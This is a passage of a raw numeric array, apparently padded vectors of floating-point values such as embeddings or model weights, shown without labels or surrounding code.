0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03717, 0.03342, 0.1619, -0.2001, 0.05426, -2.002, 0.219, -0.1167, -0.05847, 0.07135, -0.3516, 0.594, 0.1295, -0.2418, 0.0093, 0.00307, 0.1194, 0.10547, 0.2489, 0.572, 0.2534, -0.0334, -0.06323, 0.1497, 0.4722, 0.1405, 0.1562, -0.01797, 0.3528, 1.396, -5.105, -0.706, -0.4812, 0.04092, 0.001941, -0.5015, 0.03683, 0.3828, 0.08856, -0.1566, 0.0869, -0.65, -0.266, 0.07166, 0.1003, 0.02434, -0.1725, 0.04178, -0.01819, -0.0945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5254, -0.297, 0.67, -0.2299, -0.00759, -0.5386, -0.05942, 1.118, -2.041, 0.666, 0.11676, -0.1716, -1.245, -1.808, 0.006905, 0.1287, 0.2427, 0.1743, 1.086, 1.631, -0.639, -0.217, -0.04913, 0.2976, -0.5635, -0.1272, 0.02922, -0.86, 3.729, -11.61, 0.9443, -0.8926, 0.6226, -0.0796, -0.05978, 0.1783, 0.2234, 0.7876, 0.3057, -0.1785, 0.2886, -0.699, 0.4285, 0.2114, -1.5, 0.7344, -0.1624, 0.024, -0.4026, 0.2937], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06168, -0.5225, -0.1754, -0.05722, -0.295, 0.8477, 0.6416, 0.2659, 0.1603, 0.134, 0.1008, -0.129, 0.371, -0.3242, 0.05774, -0.11035, -0.4138, -0.3516, -0.4504, 0.289, -0.4253, -0.4844, -0.11694, -0.2026, 0.11945, -0.567, -0.1644, -0.2488, -0.6763, 0.4382, -0.0689, 0.0413, -0.0402, -0.481, -0.1093, -0.1761, 0.4336, 0.1231, -0.11316, 0.7466, -0.318, 0.3455, 0.384, -0.2861, 0.1356, -0.2455, 0.3396, -0.02345, 0.479, -0.02455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03333, -0.4202, 0.3958, 0.1632, 0.10876, -0.583, 0.02098, -0.1841, -0.02455, 0.04037, 0.0374, 0.05597, 0.26, 0.3523, 0.003504, -0.007835, 0.1206, 0.0725, 0.08203, -0.157, 0.004898, 0.1487, 0.001427, 0.11194, 0.3406, 0.07245, -0.09595, -0.1527, 0.0844, 0.2795, -0.9253, 0.001656, -0.00794, 0.1821, 0.06683, -0.4673, 0.0748, -0.01743, -0.0757, -0.2852, 0.05005, -0.10706, -0.402, 0.1489, 0.2668, 0.1465, -0.11646, 0.009315, 0.0834, 0.1548], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3477, -0.3274, 0.6055, 0.0714, -0.1425, 0.456, 0.541, 0.02103, -0.02684, -0.02525, 0.05542, -0.194, -0.193, 0.388, 0.05255, 0.07837, -0.5845, 0.1301, -0.4216, 0.504, -0.0926, -0.1143, -0.0689, 0.06976, 0.639, -0.129, -0.0844, -0.4978, -0.0927, 1.916, 0.0809, -0.0646, 0.03061, -0.1769, -0.1753, 0.1139, 0.649, 0.04956, -0.2151, 0.03943, -0.004787, 0.1109, -0.3567, -0.2383, -0.07825, 0.1569, 0.507, -0.0345, 0.3525, -0.3896], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2255, 0.518, 0.5586, -0.515, 0.0242, -0.4114, 0.533, 0.1759, 0.6553, 0.2854, -0.2197, -0.5786, -0.08435, -0.5015, -0.02182, -0.0432, -1.085, 0.05023, -0.787, 1.111, 0.0573, 0.003563, -0.794, 0.1033, 0.3977, -0.3015, -0.2974, -0.339, 0.827, 1.69, -0.0982, 0.2822, 0.1626, -0.2083, -0.0778, 0.875, -0.5146, 0.5176, 0.05725, 0.9478, 0.0791, 0.569, 0.1824, 0.2913, 0.0768, 0.1411, 0.5527, -0.02766, 0.0935, -0.948], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.159, -0.083, -0.524, 1.971, -1.271, 0.5483, 0.3438, -0.3967, -1.191, 0.409, -2.064, -0.2026, -0.06335, -1.193, 0.014084, 0.08655, -4.492, 1.109, -2.26, -0.03235, -0.744, -1.118, -2.43, 0.85, 0.554, -0.67, 0.37, -0.2206, -3.86, -0.824, 0.2114, -0.3035, -0.1169, -1.295, -0.733, -0.1009, 0.694, 1.192, -1.391, -0.2278, -0.697, 0.505, -0.9907, -2.965, -6.156, 0.533, -0.561, -0.009895, -0.02072, -2.564], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.786, -0.3286, 0.3745, 1.144, 1.198, 2.084, 0.1362, -0.1063, -0.2186, 0.5933, 0.03915, 0.9033, -0.9473, -4.92, 0.02597, 0.3386, -1.585, -0.6396, -2.844, -0.155, -0.6772, -0.8643, -0.91, 0.802, -1.952, -0.9727, -1.21, -0.6797, 0.1302, 1.098, 0.1765, -0.514, -0.3555, -1.221, 0.347, -0.2856, 1.886, 0.1663, -2.408, 0.68, -0.7114, 0.6587, -0.3303, -2.697, -3.184, -0.593, -3.799, 0.00861, -0.9175, 1.34], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1714, 0.0686, 1.149, 0.2344, -4.703, 1.376, 0.1985, 0.08325, 0.82, -0.3396, 0.2957, -1.424, -0.01132, 0.536, -0.00634, 0.02481, -0.6055, 0.02472, -0.4695, -0.6616, 0.2284, 0.01317, 0.126, 0.334, 1.591, -0.439, 0.2502, 0.00279, 0.1553, 2.352, 0.2129, -0.04434, -0.361, -0.5347, -0.03476, -0.3657, 0.3337, -0.256, -0.1674, 0.02158, 0.4539, 0.0556, 0.1118, -1.694, -0.6543, -0.176, -0.6304, -0.04434, 0.2239, -0.2593], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1024, -0.674, 0.5, -0.000298, 0.08624, 0.1516, 0.06097, -0.0619, 0.0397, -0.08514, -0.1737, -0.1921, 0.1829, 0.02728, -0.001123, 0.01107, 0.146, -0.141, 0.04373, 0.1439, 0.010735, -0.213, 0.1213, 0.00723, 0.4182, 0.12115, 0.05743, -0.02751, -0.09283, -0.259, 0.1595, -0.10614, -0.05853, 0.10516, 0.07587, -0.6504, 0.2028, -0.10345, 0.1761, -0.7383, 0.2583, -0.01898, -0.0925, 0.2322, -0.1266, -0.1786, 0.0003986, 0.01215, -0.0832, 0.2734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0774, -2.744, 3.426, -0.245, -0.05502, 0.08154, 0.4956, -0.07385, 1.632, -0.2957, -0.3577, -1.988, 0.282, -1.256, 0.0056, 0.4001, -1.0625, -0.311, -0.26, 0.374, -0.2664, -0.414, -0.2026, 0.303, 1.846, -0.4658, 0.502, -0.2146, 0.8687, 5.86, 0.291, 0.4915, -0.6777, -0.4172, -0.242, -2.057, 0.1608, -0.514, 0.9595, -1.355, 1.557, 1.108, -0.04874, -1.605, -1.471, -0.5747, -0.9272, -0.0397, -0.51, -1.17], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04657, -1.367, 0.6343, 0.1729, 0.1094, -0.9946, -0.04388, -0.468, -0.5986, -0.0573, -0.2341, 0.00893, -0.0973, 0.4543, 0.02791, -0.02081, 0.2103, 0.1986, 0.02095, 0.04187, 0.1503, 0.33, 0.01375, 0.3567, 0.6445, 0.09796, -0.2288, -0.293, 0.4404, -0.8867, -0.859, 0.1481, 0.03525, 0.2489, 0.03928, -1.106, -0.006046, -0.08234, -0.05017, 0.07794, 0.005054, -0.1785, -0.73, 0.1587, 0.5415, 0.2856, -0.4597, 0.000602, 0.2339, 0.1744], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2705, -0.829, 1.117, 0.08124, -0.213, -1.994, 0.3215, 0.1879, 0.2391, -0.1415, -0.11017, -0.03757, -0.1067, -1.183, -0.005142, 0.086, -0.2717, 0.0927, -0.2932, -0.3582, 0.1847, -0.002068, 0.09076, 0.3083, 0.332, -0.2913, 0.1257, -0.3232, 0.259, -2.365, -0.4414, 0.824, -0.8174, -0.3438, 0.3503, 0.747, 0.9336, 0.02615, -3.348, 1.983, 0.552, -0.6353, -0.7715, -0.563, 0.906, 0.3142, 0.1855, 0.03442, -0.3848, -0.4373], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.375, -0.1624, -0.795, -0.1542, -0.8213, 1.464, 0.339, 0.005108, -2.107, 0.5723, 1.785, -4.562, 0.3848, 0.4421, 0.003925, -0.4011, 0.1089, 0.4885, 0.1893, -5.633, 2.385, 0.282, -5.2, -2.477, -3.025, -1.706, 0.755, -0.3354, 3.12, -1.747, 0.2277, -2.07, 0.579, -0.06055, -0.1464, 0.1598, 3.535, -2.564, -0.1798, 0.11755, -4.164, -3.732, -0.0621, 0.991, -4.81, -2.074, 1.643, -0.01288, -0.2554, -0.01837], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.105, -1.213, -0.5503, 0.587, -0.561, -1.418, -0.015114, -1.688, 0.4167, 0.4915, 0.336, 0.657, -1.645, -3.111, 0.01377, 0.537, -6.22, 0.632, -2.621, -3.26, -0.931, -0.611, -2.701, 0.9106, 0.3098, -5.29, 0.07794, -0.1482, 0.839, -1.692, -0.3381, -0.446, -0.1708, -0.6753, 0.01285, 0.3315, -1.148, 1.278, -1.064, -0.887, 1.386, 0.6035, -0.263, -1.647, -3.684, 0.3423, -0.7617, -0.0362, -1.186, -1.864], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1367, -0.741, 0.8755, 0.10004, 0.0857, -0.7954, 0.1694, -0.812, -1.231, 0.0103, 0.2174, -0.9336, -0.0703, 0.013336, 0.005768, 0.01979, 0.1561, 0.0407, -0.199, -0.225, 0.3364, 0.03857, -0.1754, 0.1426, 0.05368, 0.1705, -0.1655, -0.2212, 0.2397, -1.263, 0.552, -0.1317, -0.03108, 0.2666, -0.1573, -0.707, 0.5146, -0.2103, -0.3306, -2.363, 0.2017, -0.2073, -0.7393, 0.07874, 0.2013, 0.09204, -0.03049, 0.01542, -0.0906, 0.2316], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01793, 0.1102, -0.1842, -0.05157, -0.47, -0.715, 0.3464, 0.3528, 0.133, -0.3906, -0.10144, 0.02155, 0.282, 0.03534, -0.01756, -0.03592, -0.08875, 0.02301, 0.2051, 0.1111, -0.3298, 0.0514, 0.0177, 0.0737, -0.3853, -0.05588, -0.007904, -0.1377, 0.786, -0.04608, -0.02213, -0.03967, 0.05933, -0.1095, 0.311, 0.06354, -0.1519, -0.2737, -0.136, 0.402, -0.235, 0.0899, -0.0996, 0.233, -0.1357, -0.2585, 0.3232, -0.05246, 0.2788, 0.006836], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3755, 0.2478, 0.832, -1.12, -2.115, -1.055, 0.2834, 0.612, -0.0473, -0.711, -0.2578, -0.01929, 0.11975, -0.7607, 0.0475, -0.0475, 0.04932, 0.1398, 1.188, -0.2274, -0.004498, 0.0457, 0.01006, 0.1465, 1.022, 0.2888, 0.8525, -0.128, 0.7197, -14.57, 0.675, 0.9185, -0.3848, -0.3633, 0.5454, -0.7637, -1.297, 0.2847, 0.4326, 1.023, -0.7515, 0.2993, -1.793, 0.9487, 1.019, -0.1912, -0.828, 0.00784, 0.2068, 0.948], [0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009735, -0.3872, -0.2012, 0.0377, -0.2002, -0.871, 0.02321, -0.2478, -0.2507, 0.0745, 0.3696, -0.05884, -0.1307, -0.10315, -0.02066, 0.238, -0.2544, -0.09735, -0.03326, -0.598, -0.1377, -0.2435, 0.05344, 0.2155, -0.6147, -0.155, 0.2537, -0.1279, 0.09174, -1.271, 0.1754, -1.88, -0.0522, -0.07214, -0.01839, -0.4624, -0.00539, 0.2524, 0.2834, -0.0781, -0.0559, 0.2654, -0.4692, 0.02795, 0.02704, -0.3457, -0.3015, 0.02832, -0.10486, -0.1146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00993, -0.3315, 0.1033, 0.0201, 0.01952, -0.626, -0.06775, -0.1837, -0.4624, -0.01726, -0.224, 0.10455, 0.1371, -0.0645, -0.03217, -0.03088, 0.0913, 0.02051, 0.0784, 0.3398, 0.1416, -0.01668, -0.05222, 0.0668, 0.3616, 0.08514, -0.03772, 0.08435, -0.0488, 0.985, -0.1665, -0.3933, -0.2224, 0.05643, -0.01257, 0.0991, -0.1307, 0.0497, -0.08167, -0.06903, 0.0174, -0.3005, -0.1037, 0.05008, -0.06082, -0.013115, 0.0342, -0.01799, 0.0365, 0.03638], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5425, -0.285, -4.3, -0.2778, 0.114, 1.074, -0.871, -1.1875, 0.83, 0.04843, 0.02162, -0.4443, -2.111, -0.0649, -0.031, -0.2001, 0.12115, -0.4453, -0.6206, -0.0349, 0.0399, -1.525, 0.138, 0.01543, 0.9497, 0.0693, 0.2025, 0.1611, 0.9575, 0.0032, -0.997, 0.5327, 0.0848, -0.5273, -0.143, 0.02785, 0.4111, -0.7056, -0.5464, -1.663, 0.2498, 0.0822, -0.355, -0.5933, -0.974, 
-0.0673, -0.5337, -0.0285, 0.5034, 0.2131], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.09375, -0.6147, 0.574, -0.9956, -0.2795, 0.1141, -0.07745, 0.05908, -0.476, 0.0294, -0.1934, -0.3816, 0.04407, -0.236, -0.03146, 0.056, -0.06335, -0.000429, -0.06995, -0.02309, -0.09656, -0.1698, -0.01988, -0.00419, 0.1338, -0.06885, -0.0953, -0.0446, -0.1105, 0.5483, -9.39, 0.27, -0.0331, -0.01894, -0.001501, -0.658, 0.3882, -0.01496, 0.1283, -0.6274, 0.00717, 0.078, -0.2888, -0.1488, -0.156, -0.1432, -0.06726, -0.01901, -0.1035, -0.3203], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.855, -0.8047, 3.867, 0.4275, 0.4436, -0.887, -0.05994, -2.729, 3.732, -0.248, 3.256, -0.915, -0.814, 0.4739, 0.001769, -0.2279, 0.00804, 0.3096, -1.226, 2.37, 0.3135, 0.697, -0.4956, 0.05487, 5.03, 0.3147, -1.281, -0.7954, -15.3, 1.467, 1.888, 0.2177, 0.156, 0.3909, 0.573, -2.488, -1.5625, 2.004, 0.33, 4.87, -2.945, -1.289, -1.08, 0.729, -1.541, 0.08765, 2.912, 0.00153, -0.2261, 0.945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06033, 0.885, 2.422, 0.2708, 0.00967, -0.0612, 0.596, 0.1554, 2.238, -0.1339, 0.0128, -0.4617, -0.2651, -0.1136, -0.02412, 0.2383, -0.1857, -0.1313, -0.1532, 0.2808, -0.1234, 0.004036, 0.1571, 0.02759, 1.074, -0.2866, -0.2369, -0.1556, -0.4658, 2.379, 0.2166, 0.0868, 0.048, 0.03445, 0.06052, -0.596, 0.546, 0.3076, 0.04654, -1.013, 0.1613, -0.0497, 0.149, 
-0.03793, 0.0885, -0.1559, 0.1246, 0.00963, 0.4258, -0.1531], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.10956, -0.688, 0.4155, -0.2169, 0.128, 0.1837, 0.2052, 0.02652, -0.05087, -0.01697, -0.1315, 0.0801, -0.01694, 0.1321, 0.01631, 0.03378, 0.0629, 0.1367, 0.1056, -0.626, 0.0661, 0.115, 0.1975, 0.1636, -0.1312, 0.0944, -0.1313, -0.1919, 0.0961, 0.0893, -1.969, -0.1137, 0.0805, 0.04068, 0.0469, -0.707, -0.3008, -0.00431, -0.01486, 0.05807, 0.2347, 0.02538, -0.1299, 0.2386, 0.275, 0.188, -0.05258, -0.004585, -0.07465, 0.0963], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4182, -1.408, -2.723, -0.2366, -0.269, 0.3909, -0.25, 1.094, -4.78, -0.3564, 0.0507, 0.1711, -0.1875, -0.06088, 0.03973, -0.1699, 0.364, 0.2776, 0.8184, 0.549, 0.3638, -0.1631, 0.3733, 0.2062, -0.3857, 0.6367, 0.1921, -0.0663, -0.7188, -2.021, 0.2152, 0.1998, -0.4, 0.1759, 0.1736, -0.05038, -0.701, 0.3477, 0.3599, -3.57, 0.2277, -0.4368, -0.03983, 0.315, -0.4722, 0.622, -0.5684, -0.04132, 0.11475, 0.143], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2339, -0.2426, -0.0362, 0.2847, 0.2363, 0.675, 0.611, 1.0205, -0.503, 0.6196, -0.461, 0.8936, -0.7275, 0.2416, 0.05087, 0.3389, -0.913, -0.3762, -1.3545, -0.7104, -1.161, -0.2566, -0.1179, 0.2483, -0.9946, -1.358, 0.6377, -0.03217, -2.855, 0.4587, 0.4688, -0.5894, 0.308, 0.02448, 0.1609, 0.4163, -1.958, -1.085, 0.457, -0.8857, -0.89, 
-10.695, 0.1815, -2.66, -1.396, -2.621, -0.5835, -0.0409, -1.337, -0.3318], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1924, -0.879, 1.012, -0.2317, -0.01514, -0.3052, -0.885, -0.2642, 2.705, -0.1921, -0.0543, -0.3027, 0.4316, 0.501, 0.00559, -0.0635, 0.459, -0.1616, -0.2356, -0.7246, -0.11127, 0.02446, 0.63, 0.3384, 0.8286, -0.035, -0.0919, -0.05466, -2.371, 1.894, -0.0775, -0.04913, -1.244, 0.205, 0.0713, 0.1232, 0.913, 0.5947, -0.2242, -1.03, -1.638, 2.318, 0.1805, 0.01637, 0.1425, -0.636, 0.4834, 0.04028, -0.2913, 0.876]]
